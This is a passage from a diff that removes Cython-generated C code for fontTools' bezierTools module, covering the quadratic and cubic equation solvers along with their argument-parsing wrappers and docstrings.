Args:\n a: coefficient of *x\302\262*\n b: coefficient of *x*\n c: constant term\n\n Returns:\n A list of roots. Note that the returned list is neither guaranteed to\n be sorted nor to contain unique values!\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_47solveQuadratic = {"solveQuadratic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_47solveQuadratic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_46solveQuadratic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_47solveQuadratic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_sqrt = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("solveQuadratic (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_sqrt,0}; - __pyx_defaults *__pyx_dynamic_args = __Pyx_CyFunction_Defaults(__pyx_defaults, __pyx_self); - values[3] = __Pyx_Arg_NewRef_FASTCALL(__pyx_dynamic_args->__pyx_arg_sqrt); - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveQuadratic", 0, 3, 4, 1); __PYX_ERR(0, 808, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveQuadratic", 0, 3, 4, 2); __PYX_ERR(0, 808, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (kw_args > 0) { - PyObject* value = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_sqrt); - if (value) { values[3] = __Pyx_Arg_NewRef_FASTCALL(value); kw_args--; } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 808, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "solveQuadratic") < 0)) __PYX_ERR(0, 808, __pyx_L3_error) - } - } else { - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - break; - default: goto __pyx_L5_argtuple_error; - } - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - __pyx_v_sqrt = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("solveQuadratic", 0, 3, 4, __pyx_nargs); __PYX_ERR(0, 808, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_46solveQuadratic(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_sqrt); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_46solveQuadratic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_sqrt) { - PyObject *__pyx_v_roots = NULL; - PyObject *__pyx_v_DD = NULL; - PyObject *__pyx_v_rDD = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - int __pyx_t_5; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("solveQuadratic", 1); - - /* "fontTools/misc/bezierTools.py":822 - * be sorted nor to contain unique values! - * """ - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * if abs(b) < epsilon: - * # We have a non-equation; therefore, we have no valid solution - */ - __pyx_t_1 = __Pyx_PyNumber_Absolute(__pyx_v_a); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyObject_RichCompare(__pyx_t_1, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_3); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_3); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 822, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":823 - * """ - * if abs(a) < epsilon: - * if abs(b) < epsilon: # <<<<<<<<<<<<<< - * # We have a non-equation; therefore, we have no valid solution - * roots = [] - */ - __pyx_t_3 = __Pyx_PyNumber_Absolute(__pyx_v_b); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_GetModuleGlobalName(__pyx_t_2, __pyx_n_s_epsilon); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyObject_RichCompare(__pyx_t_3, __pyx_t_2, Py_LT); __Pyx_XGOTREF(__pyx_t_1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_1); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 823, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":825 - * if abs(b) < epsilon: - * # We have a non-equation; therefore, we have no valid solution - * roots = [] # <<<<<<<<<<<<<< - * else: - * # We have a linear equation with 1 root. - */ - __pyx_t_1 = PyList_New(0); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 825, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - - /* "fontTools/misc/bezierTools.py":823 - * """ - * if abs(a) < epsilon: - * if abs(b) < epsilon: # <<<<<<<<<<<<<< - * # We have a non-equation; therefore, we have no valid solution - * roots = [] - */ - goto __pyx_L4; - } - - /* "fontTools/misc/bezierTools.py":828 - * else: - * # We have a linear equation with 1 root. - * roots = [-c / b] # <<<<<<<<<<<<<< - * else: - * # We have a true quadratic equation. Apply the quadratic formula to find two roots. - */ - /*else*/ { - __pyx_t_1 = PyNumber_Negative(__pyx_v_c); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 828, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = __Pyx_PyNumber_Divide(__pyx_t_1, __pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 828, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = PyList_New(1); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 828, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_GIVEREF(__pyx_t_2); - if (__Pyx_PyList_SET_ITEM(__pyx_t_1, 0, __pyx_t_2)) __PYX_ERR(0, 828, __pyx_L1_error); - __pyx_t_2 = 0; - __pyx_v_roots = ((PyObject*)__pyx_t_1); - __pyx_t_1 = 0; - } - __pyx_L4:; - - /* "fontTools/misc/bezierTools.py":822 - * be sorted nor to contain unique values! - * """ - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * if abs(b) < epsilon: - * # We have a non-equation; therefore, we have no valid solution - */ - goto __pyx_L3; - } - - /* "fontTools/misc/bezierTools.py":831 - * else: - * # We have a true quadratic equation. Apply the quadratic formula to find two roots. - * DD = b * b - 4.0 * a * c # <<<<<<<<<<<<<< - * if DD >= 0.0: - * rDD = sqrt(DD) - */ - /*else*/ { - __pyx_t_1 = PyNumber_Multiply(__pyx_v_b, __pyx_v_b); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __pyx_t_2 = PyNumber_Multiply(__pyx_float_4_0, __pyx_v_a); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Multiply(__pyx_t_2, __pyx_v_c); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Subtract(__pyx_t_1, __pyx_t_3); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 831, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_v_DD = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":832 - * # We have a true quadratic equation. Apply the quadratic formula to find two roots. - * DD = b * b - 4.0 * a * c - * if DD >= 0.0: # <<<<<<<<<<<<<< - * rDD = sqrt(DD) - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] - */ - __pyx_t_2 = PyObject_RichCompare(__pyx_v_DD, __pyx_float_0_0, Py_GE); __Pyx_XGOTREF(__pyx_t_2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 832, __pyx_L1_error) - __pyx_t_4 = __Pyx_PyObject_IsTrue(__pyx_t_2); if (unlikely((__pyx_t_4 < 0))) __PYX_ERR(0, 832, __pyx_L1_error) - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - if (__pyx_t_4) { - - /* "fontTools/misc/bezierTools.py":833 - * DD = b * b - 4.0 * a * c - * if DD >= 0.0: - * rDD = sqrt(DD) # <<<<<<<<<<<<<< - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] - * else: - */ - __Pyx_INCREF(__pyx_v_sqrt); - __pyx_t_3 = __pyx_v_sqrt; __pyx_t_1 = NULL; - __pyx_t_5 = 0; - #if CYTHON_UNPACK_METHODS - if (unlikely(PyMethod_Check(__pyx_t_3))) { - __pyx_t_1 = PyMethod_GET_SELF(__pyx_t_3); - if (likely(__pyx_t_1)) { - PyObject* function = PyMethod_GET_FUNCTION(__pyx_t_3); - __Pyx_INCREF(__pyx_t_1); - __Pyx_INCREF(function); - __Pyx_DECREF_SET(__pyx_t_3, function); - __pyx_t_5 = 1; - } - } - #endif - { - PyObject *__pyx_callargs[2] = {__pyx_t_1, __pyx_v_DD}; - __pyx_t_2 = __Pyx_PyObject_FastCall(__pyx_t_3, __pyx_callargs+1-__pyx_t_5, 1+__pyx_t_5); - __Pyx_XDECREF(__pyx_t_1); __pyx_t_1 = 0; - if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 833, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - } - __pyx_v_rDD = __pyx_t_2; - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":834 - * if DD >= 0.0: - * rDD = sqrt(DD) - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] # <<<<<<<<<<<<<< - * else: - * # complex roots, ignore - */ - __pyx_t_2 = PyNumber_Negative(__pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_3 = PyNumber_Add(__pyx_t_2, __pyx_v_rDD); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_3, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_3); __pyx_t_3 = 0; - __pyx_t_3 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_v_a); if (unlikely(!__pyx_t_3)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_3); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyNumber_Negative(__pyx_v_b); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_t_1 = PyNumber_Subtract(__pyx_t_2, __pyx_v_rDD); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = __Pyx_PyFloat_TrueDivideObjC(__pyx_t_1, __pyx_float_2_0, 2.0, 0, 0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_DECREF(__pyx_t_1); __pyx_t_1 = 0; - __pyx_t_1 = __Pyx_PyNumber_Divide(__pyx_t_2, __pyx_v_a); if (unlikely(!__pyx_t_1)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_1); - __Pyx_DECREF(__pyx_t_2); __pyx_t_2 = 0; - __pyx_t_2 = PyList_New(2); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 834, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __Pyx_GIVEREF(__pyx_t_3); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 0, __pyx_t_3)) __PYX_ERR(0, 834, __pyx_L1_error); - __Pyx_GIVEREF(__pyx_t_1); - if (__Pyx_PyList_SET_ITEM(__pyx_t_2, 1, __pyx_t_1)) __PYX_ERR(0, 834, __pyx_L1_error); - __pyx_t_3 = 0; - __pyx_t_1 = 0; - __pyx_v_roots = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - - /* "fontTools/misc/bezierTools.py":832 - * # We have a true quadratic equation. Apply the quadratic formula to find two roots. - * DD = b * b - 4.0 * a * c - * if DD >= 0.0: # <<<<<<<<<<<<<< - * rDD = sqrt(DD) - * roots = [(-b + rDD) / 2.0 / a, (-b - rDD) / 2.0 / a] - */ - goto __pyx_L5; - } - - /* "fontTools/misc/bezierTools.py":837 - * else: - * # complex roots, ignore - * roots = [] # <<<<<<<<<<<<<< - * return roots - * - */ - /*else*/ { - __pyx_t_2 = PyList_New(0); if (unlikely(!__pyx_t_2)) __PYX_ERR(0, 837, __pyx_L1_error) - __Pyx_GOTREF(__pyx_t_2); - __pyx_v_roots = ((PyObject*)__pyx_t_2); - __pyx_t_2 = 0; - } - __pyx_L5:; - } - __pyx_L3:; - - /* "fontTools/misc/bezierTools.py":838 - * # complex roots, ignore - * roots = [] - * return roots # <<<<<<<<<<<<<< - * - * - */ - __Pyx_XDECREF(__pyx_r); - __Pyx_INCREF(__pyx_v_roots); - __pyx_r = __pyx_v_roots; - goto __pyx_L0; - - /* "fontTools/misc/bezierTools.py":808 - * - * - * def solveQuadratic(a, b, c, sqrt=sqrt): # <<<<<<<<<<<<<< - * """Solve a quadratic equation. - * - */ - - /* function exit code */ - __pyx_L1_error:; - __Pyx_XDECREF(__pyx_t_1); - __Pyx_XDECREF(__pyx_t_2); - __Pyx_XDECREF(__pyx_t_3); - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveQuadratic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __pyx_r = NULL; - __pyx_L0:; - __Pyx_XDECREF(__pyx_v_roots); - __Pyx_XDECREF(__pyx_v_DD); - __Pyx_XDECREF(__pyx_v_rDD); - __Pyx_XGIVEREF(__pyx_r); - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -/* "fontTools/misc/bezierTools.py":841 - * - * - * def solveCubic(a, b, c, d): # <<<<<<<<<<<<<< - * """Solve a cubic equation. - * - */ - -/* Python wrapper */ -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_49solveCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -); /*proto*/ -PyDoc_STRVAR(__pyx_doc_9fontTools_4misc_11bezierTools_48solveCubic, "solveCubic(a, b, c, d)\nSolve a cubic equation.\n\n Solves *a*x*x*x + b*x*x + c*x + d = 0* where a, b, c and d are real.\n\n Args:\n a: coefficient of *x\302\263*\n b: coefficient of *x\302\262*\n c: coefficient of *x*\n d: constant term\n\n Returns:\n A list of roots. Note that the returned list is neither guaranteed to\n be sorted nor to contain unique values!\n\n Examples::\n\n >>> solveCubic(1, 1, -6, 0)\n [-3.0, -0.0, 2.0]\n >>> solveCubic(-10.0, -9.0, 48.0, -29.0)\n [-2.9, 1.0, 1.0]\n >>> solveCubic(-9.875, -9.0, 47.625, -28.75)\n [-2.911392, 1.0, 1.0]\n >>> solveCubic(1.0, -4.5, 6.75, -3.375)\n [1.5, 1.5, 1.5]\n >>> solveCubic(-12.0, 18.0, -9.0, 1.50023651123)\n [0.5, 0.5, 0.5]\n >>> solveCubic(\n ... 9.0, 0.0, 0.0, -7.62939453125e-05\n ... ) == [-0.0, -0.0, -0.0]\n True\n "); -static PyMethodDef __pyx_mdef_9fontTools_4misc_11bezierTools_49solveCubic = {"solveCubic", (PyCFunction)(void*)(__Pyx_PyCFunction_FastCallWithKeywords)__pyx_pw_9fontTools_4misc_11bezierTools_49solveCubic, __Pyx_METH_FASTCALL|METH_KEYWORDS, __pyx_doc_9fontTools_4misc_11bezierTools_48solveCubic}; -static PyObject *__pyx_pw_9fontTools_4misc_11bezierTools_49solveCubic(PyObject *__pyx_self, -#if CYTHON_METH_FASTCALL -PyObject *const *__pyx_args, Py_ssize_t __pyx_nargs, PyObject *__pyx_kwds -#else -PyObject *__pyx_args, PyObject *__pyx_kwds -#endif -) { - PyObject *__pyx_v_a = 0; - PyObject *__pyx_v_b = 0; - PyObject *__pyx_v_c = 0; - PyObject *__pyx_v_d = 0; - #if !CYTHON_METH_FASTCALL - CYTHON_UNUSED Py_ssize_t __pyx_nargs; - #endif - CYTHON_UNUSED PyObject *const *__pyx_kwvalues; - PyObject* values[4] = {0,0,0,0}; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - PyObject *__pyx_r = 0; - __Pyx_RefNannyDeclarations - __Pyx_RefNannySetupContext("solveCubic (wrapper)", 0); - #if !CYTHON_METH_FASTCALL - #if CYTHON_ASSUME_SAFE_MACROS - __pyx_nargs = PyTuple_GET_SIZE(__pyx_args); - #else - __pyx_nargs = PyTuple_Size(__pyx_args); if (unlikely(__pyx_nargs < 0)) return NULL; - #endif - #endif - __pyx_kwvalues = __Pyx_KwValues_FASTCALL(__pyx_args, __pyx_nargs); - { - PyObject **__pyx_pyargnames[] = {&__pyx_n_s_a,&__pyx_n_s_b,&__pyx_n_s_c,&__pyx_n_s_d,0}; - if (__pyx_kwds) { - Py_ssize_t kw_args; - switch (__pyx_nargs) { - case 4: values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - CYTHON_FALLTHROUGH; - case 3: values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - CYTHON_FALLTHROUGH; - case 2: values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - CYTHON_FALLTHROUGH; - case 1: values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - CYTHON_FALLTHROUGH; - case 0: break; - default: goto __pyx_L5_argtuple_error; - } - kw_args = __Pyx_NumKwargs_FASTCALL(__pyx_kwds); - switch (__pyx_nargs) { - case 0: - if (likely((values[0] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_a)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[0]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else goto __pyx_L5_argtuple_error; - CYTHON_FALLTHROUGH; - case 1: - if (likely((values[1] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_b)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[1]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, 1); __PYX_ERR(0, 841, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 2: - if (likely((values[2] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_c)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[2]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, 2); __PYX_ERR(0, 841, __pyx_L3_error) - } - CYTHON_FALLTHROUGH; - case 3: - if (likely((values[3] = __Pyx_GetKwValue_FASTCALL(__pyx_kwds, __pyx_kwvalues, __pyx_n_s_d)) != 0)) { - (void)__Pyx_Arg_NewRef_FASTCALL(values[3]); - kw_args--; - } - else if (unlikely(PyErr_Occurred())) __PYX_ERR(0, 841, __pyx_L3_error) - else { - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, 3); __PYX_ERR(0, 841, __pyx_L3_error) - } - } - if (unlikely(kw_args > 0)) { - const Py_ssize_t kwd_pos_args = __pyx_nargs; - if (unlikely(__Pyx_ParseOptionalKeywords(__pyx_kwds, __pyx_kwvalues, __pyx_pyargnames, 0, values + 0, kwd_pos_args, "solveCubic") < 0)) __PYX_ERR(0, 841, __pyx_L3_error) - } - } else if (unlikely(__pyx_nargs != 4)) { - goto __pyx_L5_argtuple_error; - } else { - values[0] = __Pyx_Arg_FASTCALL(__pyx_args, 0); - values[1] = __Pyx_Arg_FASTCALL(__pyx_args, 1); - values[2] = __Pyx_Arg_FASTCALL(__pyx_args, 2); - values[3] = __Pyx_Arg_FASTCALL(__pyx_args, 3); - } - __pyx_v_a = values[0]; - __pyx_v_b = values[1]; - __pyx_v_c = values[2]; - __pyx_v_d = values[3]; - } - goto __pyx_L6_skip; - __pyx_L5_argtuple_error:; - __Pyx_RaiseArgtupleInvalid("solveCubic", 1, 4, 4, __pyx_nargs); __PYX_ERR(0, 841, __pyx_L3_error) - __pyx_L6_skip:; - goto __pyx_L4_argument_unpacking_done; - __pyx_L3_error:; - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_AddTraceback("fontTools.misc.bezierTools.solveCubic", __pyx_clineno, __pyx_lineno, __pyx_filename); - __Pyx_RefNannyFinishContext(); - return NULL; - __pyx_L4_argument_unpacking_done:; - __pyx_r = __pyx_pf_9fontTools_4misc_11bezierTools_48solveCubic(__pyx_self, __pyx_v_a, __pyx_v_b, __pyx_v_c, __pyx_v_d); - - /* function exit code */ - { - Py_ssize_t __pyx_temp; - for (__pyx_temp=0; __pyx_temp < (Py_ssize_t)(sizeof(values)/sizeof(values[0])); ++__pyx_temp) { - __Pyx_Arg_XDECREF_FASTCALL(values[__pyx_temp]); - } - } - __Pyx_RefNannyFinishContext(); - return __pyx_r; -} - -static PyObject *__pyx_pf_9fontTools_4misc_11bezierTools_48solveCubic(CYTHON_UNUSED PyObject *__pyx_self, PyObject *__pyx_v_a, PyObject *__pyx_v_b, PyObject *__pyx_v_c, PyObject *__pyx_v_d) { - PyObject *__pyx_v_a1 = NULL; - PyObject *__pyx_v_a2 = NULL; - PyObject *__pyx_v_a3 = NULL; - PyObject *__pyx_v_Q = NULL; - PyObject *__pyx_v_R = NULL; - PyObject *__pyx_v_R2 = NULL; - PyObject *__pyx_v_Q3 = NULL; - PyObject *__pyx_v_R2_Q3 = NULL; - PyObject *__pyx_v_x = NULL; - PyObject *__pyx_v_theta = NULL; - PyObject *__pyx_v_rQ2 = NULL; - PyObject *__pyx_v_a1_3 = NULL; - PyObject *__pyx_v_x0 = NULL; - PyObject *__pyx_v_x1 = NULL; - PyObject *__pyx_v_x2 = NULL; - PyObject *__pyx_r = NULL; - __Pyx_RefNannyDeclarations - PyObject *__pyx_t_1 = NULL; - PyObject *__pyx_t_2 = NULL; - PyObject *__pyx_t_3 = NULL; - int __pyx_t_4; - int __pyx_t_5; - PyObject *__pyx_t_6 = NULL; - int __pyx_t_7; - double __pyx_t_8; - double __pyx_t_9; - PyObject *__pyx_t_10 = NULL; - PyObject *__pyx_t_11 = NULL; - int __pyx_t_12; - int __pyx_lineno = 0; - const char *__pyx_filename = NULL; - int __pyx_clineno = 0; - __Pyx_RefNannySetupContext("solveCubic", 0); - __Pyx_INCREF(__pyx_v_a); - - /* "fontTools/misc/bezierTools.py":879 - * # found at: http://www.strangecreations.com/library/snippets/Cubic.C - * # - * if abs(a) < epsilon: # <<<<<<<<<<<<<< - * # don't just test for zero; for very small values of 'a' solveCubic() - * # returns unreliable results, so we fall back to quad. - */ 